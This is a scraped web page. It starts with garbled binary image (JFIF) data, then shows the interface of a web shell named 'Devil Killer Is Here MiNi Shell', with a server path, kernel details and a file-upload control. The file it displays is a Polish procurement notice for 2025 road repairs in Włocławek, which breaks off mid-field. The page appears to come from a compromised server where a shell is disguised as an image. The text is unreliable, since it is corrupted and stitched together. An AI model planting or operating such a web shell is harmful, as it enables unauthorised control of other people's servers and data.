JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250701/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250701/0030305301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remonty dróg na terenie miasta Włocławek w roku 2025 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIASTO WŁOCŁAWEK - Urząd Miasta Włocławek</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910866910</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zielony Rynek 11/13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Włocławek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@um.wloclawek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wloclawek.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">GMINA MIASTO WŁOCŁAWEK - Urząd Miasta Włocławek</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910866910</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Zielony Rynek 11/13</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Włocławek</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">87-800</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">+48 (54) 414 40 00</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">zamowienia@um.wloclawek.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.wloclawek.eu</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remonty dróg na terenie miasta Włocławek w roku 2025 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d0bce486-9cd1-4721-878c-9a6f13116516</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00303053</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00065448/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.53 Remonty dróg na terenie Miasta Włocławek w roku 2025 z podziałem na 2 zadania</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://umwloclawek.logintrade.net/zapytania_email,202368,8fa5b1c6a17d2ecdf1f15ea6ffce57e7.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W prowadzonym postępowaniu komunikacja pomiędzy Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2. W prowadzonym postępowaniu komunikacja pomiędzy Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy<br/>Przetargowej Urzędu Miasta Włocławek, dostępnej pod adresem: https://umwloclawek.logintrade.net/rejestracja/ustawowe.html oraz<br/>za pomocą poczty elektronicznej, z zastrzeżeniem pkt. 3.<br/>3. Środkiem komunikacji elektronicznej, służącym złożeniu oferty przez Wykonawcę, jest jego prawidłowe złożenie na Platformie<br/>Przetargowej Urzędu Miasta Włocławek dostępnej pod adresem:<br/>https:/ umwloclawek.logintrade.net/rejestracja/ustawowe.html, w wierszu oznaczonym tytułem oraz znakiem sprawy zgodnym z<br/>niniejszym postępowaniem.<br/>4. Korespondencję związaną z prowadzonym postępowaniem można również kierować na następujący adres poczty elektronicznej<br/>Zamawiającego: zamowienia@um.wloclawek.pl, z zastrzeżeniem pkt. 3.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Korzystanie z Platformy<br/>Przetargowej Urzędu Miasta Włocławek przez Wykonawcę jest bezpłatne.<br/>2. Instrukcja korzystania z Platformy Przetargowej Urzędu Miasta Włocławek dostępna jest pod adresem:<br/>https://umwloclawek.logintrade.net/rejestracja/instrukcje.html.<br/>3. Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat<br/>SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie Przetargowej<br/>Urzędu Miasta Włocławek ma dostęp do możliwości złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na<br/>zadawanie pytań do treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach.<br/>4. Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz<br/>informacji przekazywanych przy użyciu Platformy Przetargowej Urzędu Miasta Włocławek:<br/>1) dopuszczalne przeglądarki internetowe:<br/>a) Internet Explorer 10 i nowsze, Edge<br/>b) Google Chrome,<br/>c) Mozilla Firefox,<br/>d) Opera;<br/>2) pozostałe wymagania techniczne:<br/>a) dostęp do sieci Internet,<br/>b) obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax,<br/>c) włączona obsługa JavaScript,<br/>d) zalecana szybkość łącza internetowego powyżej 500 KB/s,<br/>e) zainstalowany Acrobat Reader,<br/>f) zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy;<br/>3) wspierane są rozwiązania dostarczane przez firmy:<br/>a) Polskie Centrum Certyfikacji Elektronicznej Sigillum Polskiej Wytwórni Papierów Wartościowych S.A.,<br/>b) Centrum Obsługi Podpisu Elektronicznego Szafir Krajowej Izby Rozliczeniowej S.A.,<br/>c) Powszechne Centrum Certyfikacji Certum firmy Unizeto Technologies S.A.,<br/>d) Kwalifikowane Centrum certyfikacji Kluczy CenCert firmy Safe Technologies S.A.;<br/>4) dopuszczalne formaty przesyłanych danych: Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji<br/>elektronicznej przesyła się w formatach danych określonych w przepisach wydanych na podstawie § 2 ust. 1 i 2 rozporządzenia<br/>Prezesa Rady Ministrów z dnia 30 grudnia 2020 roku w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452 ze zm.). Równocześnie Zamawiający rekomenduje na format danych<br/>przesyłanych plików: *.pdf.<br/>5) maksymalny rozmiar pojedynczego pliku: 150 MB, przy czym nie określa się limitu liczby plików.<br/>5. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.<br/>6. Zamawiający zaleca, aby nazwa plików lub katalogów przesyłanych Zamawiającemu przy użyciu Platformy Przetargowej Urzędu<br/>Miasta Włocławek, dostępnej pod adresem: https://umwloclawek.logintrade.net/rejestracja/ustawowe.html, oraz za pomocą poczty<br/>elektronicznej zawierała maksymalnie 50 znaków.<br/>7. W przypadku niezastosowania się przez Wykonawcę do zalecenia Zamawiającego, o którym mowa w pkt. 7, Wykonawca<br/>przyjmuje na siebie wyłączne ryzyko braku możliwości otwarcia przez Zamawiającego przesłanego pliku lub katalogu, a tym samym<br/>ryzyko braku możliwości zapoznania się przez Zamawiającego treścią przesłanego pliku lub katalogu.<br/>8. Ofertę oraz oświadczenie, o którym mowa w art. 125 ust. 1 ustawy PZP, składa się, pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZ.ZP.271.16.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1345345,02 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.2.2.) Krótki opis przedmiotu zamówienia<br/>Zadanie nr 1 pn. „Remonty cząstkowe dróg na terenie miasta Włocławek w roku 2025”<br/>Przedmiot zamówienia stanowią roboty budowlane, polegające na remontach cząstkowych dróg.<br/>Zamawiający przewiduje możliwość skorzystania z prawa opcji w wysokości do 30% ceny brutto za realizację zamówienia<br/>podstawowego.<br/>Zamawiający przewiduje realizację przedmiotowej inwestycji w sposób następujący:<br/>Zamówienie podstawowe:<br/>Zakres:<br/>1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycje od 1 do 6.<br/>2. Zamówienie obejmuje następujące roboty podstawowe:<br/>a) Ręczne roboty ziemne w gruncie kat III. Odspojenie gruntu i przewóz z zagospodarowaniem przez Wykonawcę;<br/>b) Roboty ziemne wykonywane koparkami z transportem urobku samochodami samowyładowczymi z zagospodarowaniem<br/>przez Wykonawcę. Grunt kategorii III;<br/>c) Zasypanie wykopów z zagęszczeniem ręcznym z piasku dostarczonego w miejsce wbudowania;<br/>d) Wykonanie koryta głębokości 10 cm. Grunt kat I-III;<br/>e) Załadunek i wywóz ziemi samochodami samowyładowczymi z zagospodarowaniem przez Wyko-nawcę.<br/>3. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych Specyfikacjach Technicznych,<br/>stanowiących integralną część niniejszej SWZ.<br/>II. Roboty rozbiórkowe.<br/>1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycje od 7 do 39.<br/>2. Zamówienie obejmuje następujące roboty podstawowe:<br/>a) Cięcie nawierzchni piłą do głębokości 10 cm;<br/>b) Rozbiórkę fragmentów warstw podbudów i nawierzchni jezdni oraz chodników, rozbiórkę cząst-kową krawężników,<br/>obrzeży, oporników, ław betonowych, z wywozem gruzu poza teren robót z zagospodarowaniem przez Wykonawcę;<br/>c) Sortowanie rozebranych elementów nadających się do ponownego wbudowania z odwozem na składowisko<br/>Zamawiającego, jeśli tak zadecyduje Inspektor Nadzoru; miejsce odwozu zosta-nie wskazane przez Zamawiającego na<br/>terenie miasta Włocławek (transport do 20km).<br/>3. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych Specyfikacjach Technicznych,<br/>stanowiących integralną część niniejszej SWZ.<br/>III. Podbudowy.<br/>1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycje od 40 do 45.<br/>2. Zamówienie obejmuje następujące roboty podstawowe:<br/>a) Mechaniczne profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni;<br/>b) Warstwa odsączająca z piasku gr 10 cm;<br/>c) Podbudowy betonowe z betonu C12/15. Grubość warstwy po zagęszczeniu 15 cm;<br/>d) Podbudowy z kruszywa łamanego. Grubość warstwy po zagęszczeniu 20 cm.<br/>3. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych Specyfikacjach Technicznych,<br/>stanowiących integralną część niniejszej SWZ.<br/>IV. Nawierzchnie.<br/>1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycje od 46 do 75.<br/>2. Zamówienie obejmuje następujące roboty podstawowe:<br/>a) Nawierzchnia z płyt drogowych betonowych sześciokątnych lub kwadratowych o grubości 12 cm z wypełnieniem spoin<br/>piaskiem. Materiał Wykonawcy lub Zamawiającego;<br/>b) Nawierzchnia z kostki betonowej szarej lub kolorowej gr. 6 cm na podsypce cementowo-piaskowej. Materiał Wykonawcy<br/>lub Zamawiającego;<br/>c) Nawierzchnia z kostki betonowej szarej lub kolorowej gr. 8 cm na podsypce cementowo-piaskowej. Materiał Wykonawcy<br/>lub Zamawiającego;<br/>d) Nawierzchnia z kostki kamiennej 8/11 na podsypce cementowo-piaskowej, z wypełnieniem spoin cementem (chodnik).<br/>Materiał Wykonawcy lub Zamawiającego;<br/>e) Nawierzchnia z kostki kamiennej 15/17 na podsypce cementowo-piaskowej, z wypełnieniem spo-in cementem (jezdnia).<br/>Materiał Wykonawcy lub Zamawiającego;<br/>f) Nawierzchnia z płyt ażurowych o powierzchni do 1 m2. Materiał Wykonawcy;<br/>g) Wykonanie nawierzchni z brukowca z kamienia narzutowego (polnego), wysokość brukowca 16 20 cm. Materiał<br/>Wykonawcy lub Zamawiającego;<br/>h) Nawierzchnia betonowa z betonu c20/25 o grubości 12 cm;<br/>i) Nawierzchnia chodników z płyt betonowych o wymiarach 35x35x5 cm na podsypce cementowo-piaskowej. Materiał<br/>Wykonawcy lub Zamawiającego;<br/>j) Nawierzchnia chodników z płyt betonowych o wymiarach 50x50x7 cm na podsypce cementowo-piaskowej. Materiał<br/>Wykonawcy lub Zamawiającego;<br/>k) Nawierzchnia z tłucznia kamiennego. Grubość warstwy 15 cm po zagęszczeniu;<br/>l) Nawierzchnia poboczy filtracyjnych z tłucznia kamiennego frakcji 16-31,5mm grubości 50cm;<br/>m) Nawierzchnia z destruktu bitumicznego. Grubość warstwy po zagęszczeniu 10 cm;<br/>n) Remonty cząstkowe nawierzchni bitumicznych mieszankami mineralno - asfaltowymi wg PN-EN 13108-1 dla ruchu<br/>ciężkiego z docięciem, dokuciem i smarowaniem – warstwa ścieralna do głębokości 4 cm;<br/>o) Remonty cząstkowe nawierzchni bitumicznych mieszankami mineralno - asfaltowymi<br/>z docięciem, dokuciem, smarowaniem - ręczne uzupełnienie podbudowy bitumicznej mieszan-kami mineralno - asfaltowymi<br/>wg PN-EN 13108-1 dla ruchu ciężkiego - średnia grubość 7 cm;<br/>p) Remonty cząstkowe nawierzchni bitumicznych mieszankami mineralno - asfaltowymi - wykony-wane przy użyciu<br/>recyklera - naprawy nawierzchni w technologii uproszczonej - bez docinania i smarowania krawędzi łat ( w trybie<br/>awaryjnym);<br/>q) Humusowanie z obsianiem przy grubości warstwy ziemi urodzajnej (humusu) 5 cm z dowozem ziemi urodzajnej.<br/>3. Dla pozycji gdzie roboty należy wykonać z materiału Zamawiającego, Zamawiający wskaże miejsce składowania<br/>materiałów zlokalizowane na terenie miasta Włocławek a Wykonawca załaduje i dowie-zie materiał w miejsce wbudowania4. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych Specyfikacjach Technicznych,<br/>stanowiących integralną część niniejszej SWZ.<br/>V. Krawężniki i obrzeża.<br/>1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycje od 76 do 89.<br/>2. Zamówienie obejmuje następujące roboty podstawowe:<br/>a) Ustawienie krawężników betonowych wystających o wymiarach 15x30 cm na ławie betonowej z oporem z betonu c12/15.<br/>Materiał Wykonawcy lub z rozbiórki;<br/>b) Ustawienie krawężników kamiennych wystających o wymiarach 15x30 cm na ławie betonowej z oporem z betonu c12/15.<br/>Materiał z rozbiórki;<br/>c) Ustawienie krawężników betonowych wystających o wymiarach 20x30 cm na ławie betonowej z oporem z betonu c12/15.<br/>Materiał Wykonawcy lub z rozbiórki;<br/>d) Ustawienie krawężników betonowych najazdowych o wymiarach 15x22 cm na ławie betonowej z oporem z betonu<br/>c12/15. Materiał Wykonawcy lub z rozbiórki;<br/>e) Ustawienie krawężników betonowych wtopionych o wymiarach 12x25 cm na ławie betonowej z oporem z betonu c12/15.<br/>Materiał Wykonawcy lub z rozbiórki;<br/>f) Ustawienie obrzeży betonowych 8x30 cm na ławie betonowej z oporem. Materiał Wykonawcy lub z rozbiórki;<br/>g) Ustawienie obrzeży betonowych 6x20 cm na podsypce piaskowej. Materiał Wykonawcy lub z roz-biórki;<br/>h) Ławy betonowe z oporem pod krawężniki i obrzeża z betonu C12/15;<br/>3. Przy pozycjach w których materiał zapewnia Zamawiający (tj. krawężniki, obrzeża), Zamawiający wskaże miejsce<br/>składowania materiałów zlokalizowane na terenie miasta Włocławek, a Wykonawca załaduje i dowiezie materiał w miejsce<br/>wbudowania (transport do 20 km).<br/>4. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych Specyfikacjach Technicznych,<br/>stanowiących integralną część niniejszej SWZ.<br/>VI. Urządzenia infrastruktury podziemnej.<br/>1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycje od 90 do 98.<br/>2. Zamówienie obejmuje następujące roboty podstawowe:<br/>a) Regulacja pionowa studzienek dla urządzeń podziemnych – wpustów ulicznych;<br/>b) Regulacja pionowa studzienek z wbudowaniem pierścienia odciążającego, pokrywy nastudzien-nej oraz obudowy<br/>żeliwnej z żeliwa szarego z rusztem dla urządzeń podziemnych – wpustów ulicznych;<br/>c) Uzupełnienie brakującego rusztu wpustu ulicznego z tworzywa sztucznego (polimerobetonu);<br/>d) Regulacja pionowa studzienek dla urządzeń podziemnych - włazów kanałowych;<br/>e) Regulacja pionowa studzienek dla urządzeń podziemnych z zamontowaniem nowego włazu typu ciężkiego z żeliwa<br/>szarego;<br/>f) Uzupełnienie pokrywy żelbetowej o średnicy 70cm dla włazu kanalizacji deszczowej;<br/>g) Naprawa betonowych elementów kanalizacji deszczowej. Objętość betonu w jednym miejscu do 0,3 m3;<br/>h) Regulacja pionowa studzienek dla urządzeń podziemnych – zasuw wodociągowych i gazowych;<br/>i) Regulacja pionowa studzienek dla urządzeń podziemnych – studni teletechnicznych.<br/>3. Gruz oraz materiały nienadające się do ponownego wbudowania odwieźć poza teren robót z zagospodarowaniem przez<br/>Wykonawcę.<br/>4. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych Specyfikacjach Technicznych,<br/>stanowiących integralną część niniejszej SWZ.<br/>VII. Inne roboty.<br/>1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycja 99.<br/>2. Zamówienie obejmuje następujące roboty podstawowe:<br/>roboty nie przewidziane w kosztorysie, a mogące wystąpić przy realizacji umowy, będą rozliczane do wysokości 2,0 %<br/>wartości zsumowanych pozycji od nr 1 do nr 98. Roboty nie przewidziane rozliczane będą zgodnie z postanowieniami<br/>umowy określonymi w § 7 ust.8.<br/>Prawo opcji:<br/>Zamawiający zgodnie z treścią art. 441 ust. 1 ustawy pzp przewiduje możliwość zastosowania prawa opcji.<br/>Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji w wysokości do 30% ceny brutto za realizację<br/>zamówienia podstawowego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 741605,28 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności 